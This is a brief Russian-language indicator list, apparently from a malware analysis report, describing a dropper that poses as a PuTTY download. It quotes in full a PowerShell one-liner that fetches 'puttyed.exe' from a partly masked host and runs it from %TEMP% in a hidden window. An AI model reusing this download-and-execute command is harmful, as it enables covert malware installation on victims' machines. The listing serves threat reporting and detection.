Техническая информация
- http://qu##.software/puttyed.exe как %temp+%\godxz.exe
- %TEMP%\godxz.exe
- http://qu##.software/puttyed.exe
- DNS ASK qu##.software
- '%TEMP%\godxz.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-object System.Net.WebClient).DownloadFile('http://qu##.software/puttyed.exe',$env:Temp+'\GoDXZ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\GoDXZ.exe')' (со скрытым окном)